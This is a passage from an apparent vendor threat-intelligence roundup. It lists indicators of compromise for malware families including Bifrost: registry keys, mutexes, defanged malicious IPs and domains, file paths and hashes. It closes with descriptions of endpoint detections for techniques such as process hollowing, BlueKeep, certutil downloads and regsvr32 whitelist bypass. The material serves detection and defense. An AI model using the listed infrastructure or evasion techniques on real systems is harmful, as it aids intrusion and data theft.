<HKCU>\SOFTWARE\MICROSOFT\AGHE
Value Name: 14c015a5
1
<HKCU>\SOFTWARE\MICROSOFT\VYUCEC
Value Name: 32e7554e
1
<HKCU>\SOFTWARE\MICROSOFT\VYUCEC
Value Name: j67a384
1
<HKCU>\SOFTWARE\MICROSOFT\VYUCEC
Value Name: 36b9ba1c
1
<HKCU>\SOFTWARE\MICROSOFT\COPOUV
Value Name: 1i3ae11a
1
<HKCU>\SOFTWARE\MICROSOFT\COPOUV
Value Name: ea006f8
1
<HKCU>\SOFTWARE\MICROSOFT\COPOUV
Value Name: 1e74d800
1
<HKCU>\SOFTWARE\MICROSOFT\AWOJAD
Value Name: hijc2ga
1
<HKCU>\SOFTWARE\MICROSOFT\AWOJAD
Value Name: 2j7e3bb4
1
<HKCU>\SOFTWARE\MICROSOFT\AWOJAD
Value Name: 12f2286c
1
<HKCU>\SOFTWARE\MICROSOFT\BYCUO
Value Name: 21hc4b0g
1
<HKCU>\SOFTWARE\MICROSOFT\BYCUO
Value Name: ejhh122
1
<HKCU>\SOFTWARE\MICROSOFT\BYCUO
Value Name: 1h1dfhha
1
<HKCU>\SOFTWARE\MICROSOFT\IXIJQO
Value Name: 36d5d0id
1
<HKCU>\SOFTWARE\MICROSOFT\NEEZ
Value Name: 96jb5ie
1
<HKCU>\SOFTWARE\MICROSOFT\IXIJQO
Value Name: 1354daf3
1
<HKCU>\SOFTWARE\MICROSOFT\NEEZ
Value Name: 1ej224cc
1
<HKCU>\SOFTWARE\MICROSOFT\ENVAM
Value Name: 229cb09e
1
Mutexes Occurrences Global\{C30C6CF2-932B-408E-55BA-04D54CAC27C8}
11
Global\{566D79B0-8669-D5EF-55BA-04D54CAC27C8}
11
Global\{C8D239CA-C613-4B50-55BA-04D54CAC27C8}
11
Global\{C8D239CB-C612-4B50-55BA-04D54CAC27C8}
11
Local\{73DE6ED9-9100-F05C-55BA-04D54CAC27C8}
11
Local\{A9348FD8-7001-2AB6-55BA-04D54CAC27C8}
11
Local\{A9348FDF-7006-2AB6-55BA-04D54CAC27C8}
11
Global\{73DE6ED9-9100-F05C-55BA-04D54CAC27C8}
11
Global\{A5D858EA-A733-265A-55BA-04D54CAC27C8}
11
Global\{A9348FD8-7001-2AB6-55BA-04D54CAC27C8}
11
Global\{A9348FDF-7006-2AB6-55BA-04D54CAC27C8}
11
Local\{C8D239CA-C613-4B50-55BA-04D54CAC27C8}
11
Local\{C8D239CB-C612-4B50-55BA-04D54CAC27C8}
11
Local\{E9745CFB-A322-6AF6-55BA-04D54CAC27C8}
11
Global\{EC526BB1-9F5D-3B52-7F38-97EEB2CD3DDC}
11
Local\{AC12B892-4C7E-7B12-7F38-97EEB2CD3DDC}
11
Global\{866A889B-7C77-516A-7F38-97EEB2CD3DDC}
11
Global\{EC526BB6-9F5A-3B52-7F38-97EEB2CD3DDC}
11
Global\{36B88AB0-7E5C-E1B8-7F38-97EEB2CD3DDC}
11
Global\{E0BEBC83-486F-37BE-7F38-97EEB2CD3DDC}
11
Local\{8DB4DDA2-294E-5AB4-7F38-97EEB2CD3DDC}
11
Global\{130B9DD9-6935-C40B-7F38-97EEB2CD3DDC}
11
Local\{8DB4DDA3-294F-5AB4-7F38-97EEB2CD3DDC}
11
GLOBAL\{<random GUID>}
11
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences 172[.]217[.]6[.]196
11
194[.]94[.]127[.]98
11
69[.]39[.]74[.]6
11
108[.]211[.]64[.]46
11
64[.]219[.]121[.]189
11
99[.]76[.]3[.]38
11
184[.]77[.]29[.]7
11
189[.]148[.]234[.]112
11
71[.]43[.]217[.]3
9
96[.]57[.]35[.]109
9
71[.]42[.]56[.]253
9
101[.]162[.]73[.]132
9
99[.]122[.]152[.]158
9
66[.]180[.]118[.]226
9
66[.]117[.]77[.]134
7
1[.]186[.]47[.]244
7
13[.]107[.]21[.]200
6
176[.]73[.]85[.]137
6
120[.]151[.]159[.]254
5
204[.]79[.]197[.]200
4
50[.]22[.]46[.]49
4
94[.]68[.]49[.]208
3
94[.]70[.]45[.]182
3
122[.]170[.]68[.]114
3
187[.]25[.]37[.]13
3
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences cyxaerkijeuaupzhqjzxhkzmrmvxw[.]net
3
gmwgkfjfrcdamydbuucrhxzxqclv[.]org
3
hmnbdanrschumrtouxhmxwhfe[.]biz
3
hseuswtumvofhaugxcbuaskifzp[.]ru
3
hvwuwdellgqcaivwkeqzxhkhyea[.]org
3
knibxwsofqprztzpbyibhpvqcsh[.]ru
3
ldugqylugovtcpfuingawkugnws[.]com
3
llxcijbliflgqhiijivxkvkrcr[.]com
3
mjhhmhrovocqlnkjqkuayhxgvgoj[.]net
3
mvdyheugepjxxdgyxxsuceqv[.]info
3
mzqocmpfltdlirxcqwxwdmb[.]info
3
nbvcqsprcapbymreyvojvteagy[.]org
3
pgdgqxhufexpnfqcedvbaythu[.]com
3
pvyhfypvemoeqhxsgerotsorpsfe[.]ru
3
rshuptpdiypmjovfebcetxkud[.]com
3
soamvwpqwdxougljpjwpfbuzpuky[.]biz
3
tstcfobmbcizlrramfuhwckrn[.]net
3
tvkdezvwqkqclpnxsdapinamd[.]com
3
xgijwozlwbiddyeavkvintxnrv[.]biz
3
xwgbavssggegeubilbnzdpbwkjzt[.]biz
3
jvzxcyfquohmzyotkswskjnbn[.]biz
2
zthqlrtgcexobqkpqkoydheikj[.]org
2
kljvxotcuplskxqwbyizbro[.]org
2
vklfwsfqpbsxvobnzrkxshmrkd[.]com
2
xcpijwuyvktcbmuodykbkbp[.]biz
2
*See JSON for more IOCs
Files and or directories created Occurrences %APPDATA%\<random, matching '[a-z0-9]{3,7}'>
11
%HOMEPATH%\AppData\LocalLow\<random, matching '[a-z]{4,6}.[a-z]{3}'>
11
%APPDATA%\<random, matching '[A-Z][a-z]{3,5}\[a-z]{4,6}'>.exe
11
File Hashes 008eb39699e3f1e25a99ad5ad0e009479a28265d71640fff690a150ab6333281
0129de12fe86b237b56e2571270384e0c8c4ddb56231f2c567ddba0db41aeae3
04b41f395b07bfb1a4fe8336f16db600e5c3d2be4668b5f617ce641d5797dfd9
0a589773315e8bc6db275b0e32de138ede9e27286500edd49eb664b6b733ebbc
0d714de796072382a35d9df9d3016d1056c9984ecf4a6833c02aec4b23808935
0f97093b075563e9b3d47189385f039d21748dec6e1206067370b47092d9bf61
0fc19df55c679f8227f6a09054a5b127dd06daf19ca661be91a1b96693ab8e6f
104293454eb174fb1884c8cb6e58d30f906b8d329bda3e20ca59e25639dc4ad4
13e3edf187300d22d6dbf77bde2d76520f51cf66fa759ebe38f188f8e56e0143
17cd0bb98f0af47043726aa86d97006a9e3e7b8c8872dad9d039efa3c3a4b2f1
18a09411244cf70c6c4962f5f5f1d1f236df10a6bab619abbcdad1abae2a7894
1b2a9b35e1f9e80617d5e2954ee05eb315b820c9e35da72f5a826bbff7c8bada
1d3692cf25073a5196bbdf2e2ccb379565608f284e76be4e958c30b37cb197b6
20be0007f25a1d12a8d6e8097d6a069a2b3c490752d41ea6122ac9374a183a5b
216dd43e1c914aafce59f5d33d08a4e2f8ce49eeda6201bbf305a155d660bf25
23889f129e9110a487a3e8414ca391c1121b77d52004a32ce71ad94182e56971
252dc756b8ae9aa8801f1b0beb037d106171737b2b11726bd81c665cf1426f32
2d7d0a2e4dbf9068a88dc6719ca3f5378656254640016a466e2967ac6305ac5d
30dc76d5b547a28814954b7944994298752508aee2efb08a61167ee1867adb98
3135534aa250fbd72855c979b35d9576baf00eb35ae7d754d008bab6f79bb97a
320400599f98440e7b5279c237c3dc3e7b436df97d234ccca0655c41132a6f13
32300287ad3597b90ea74ed4a15deb66c5b582edfd07a8fc83c03ef1f83c5dfb
324f36e3aa5ee93cfe61197459f3ee4339ecf0d77923ead7b58d8ffd0d881fe2
3297444a89a624daeb5dac74676a934f860674f5dde6abc604385b973289c034
33df5508c74510411d13ce0f081dfad167a2578fa4e39f57483e29281871c48b*See JSON for more IOCs
Coverage Product Protection AMP
Cloudlock
N/A
CWS
Email Security
Network Security
Stealthwatch
N/A
Stealthwatch Cloud
N/A
Threat Grid
Umbrella
WSA
Screenshots of Detection AMP
ThreatGrid
MITRE ATT&CK Win.Trojan.Bifrost-9762706-0 Indicators of Compromise IOCs collected from dynamic analysis of 10 samples Registry Keys Occurrences <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: wextract_cleanup0
10
Mutexes Occurrences Bif1234
7
Bif123
2
Files and or directories created Occurrences %TEMP%\IXP000.TMP
10
%TEMP%\IXP000.TMP\TMP4351$.TMP
10
%TEMP%\IXP000.TMP\server.exe
7
%ProgramFiles%\Bifrost\server.exe
2
%TEMP%\IXP000.TMP\2.exe
1
%TEMP%\IXP000.TMP\C.exe
1
%TEMP%\IXP000.TMP\Nashy.exe
1
File Hashes 0c7cfdb105207defaace858de7a8ef41901a4e5a74e8c9979d9404d83e224281
1030569e9129cb53086600f621e3a7b63783b5a923be50f6ca37bbd457770a8c
57271aac1488b190544c050c8c85cc9754b09a2d52e6a68391253c8896650206
79c335ad937f152d5e3d00ee75c39ad3abfe346e8b99bea411dd2154b3c8d248
8b539518d084a081d6b6a5706665cc72dd71071e13dc16baf8d74e214c79e0ac
a1bfc3a15fba0c137b35a437c08175ccd538d2f3c0b0d88f638464375f86a687
c4fa768634a7a6a8fcd7e70aabf2977c66f61b6329b15d75d00c0fa23d6d9b9c
c880e5c781c95fa30ee3320e3df2398e5b3121eec412da2aba6e523691159253
d628dd1d65514247d90cd78e0f8a730e2d7fe9a1506b3bdca3ebcc74a6c657a1
d8d8f7680ac056a17693ac03dbadbb02410917a67d8c55ced688fc9039296c8bCoverage Product Protection AMP
Cloudlock
N/A
CWS
Email Security
Network Security
Stealthwatch
N/A
Stealthwatch Cloud
N/A
Threat Grid
Umbrella
N/A
WSA
N/A
Screenshots of Detection AMP
ThreatGrid
MITRE ATT&CK Exploit Prevention Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
Dealply adware detected - (9487)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Process hollowing detected - (4885)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Excessively long PowerShell command detected - (4835)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
CVE-2019-0708 detected - (1444)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
Certutil.exe is downloading a file - (988)
The certutil.exe utility has been detected downloading and executing a file. Upon execution, the downloaded file behaved suspiciously. The normal usage of certutil.exe involves retrieving certificate information. Attackers can use this utility to download additional malicious payloads.
Smoke Loader detected - (799)
Smoke Loader has been detected. Smokeloader is used mainly to execute other malicious software, like ransomware or cryptocurrency miners. Its initial infection vector is usually an email with a malicious Microsoft Word document or delivered through an exploit kit. Smokeloader uses various plugins designed to steal data from its victims, particularly credentials stored on the system or transfered over HTTP, HTTPS, FTP, SMTP, POP3 or IMAP.
Squiblydoo application whitelist bypass attempt detected. - (603)
An attempt to bypass application whitelisting via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker controlled server.
Crystalbit-Apple DLL double hijack detected - (542)
Crystalbit-Apple DLL double hijack was detected. During this attack, the adversary abuses two legitimate vendor applications, such as CrystalBit and Apple, as part of a dll double hijack attack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and in some cases spyware deployment.
Installcore adware detected - (262)
Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
Kovter injection detected - (138)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
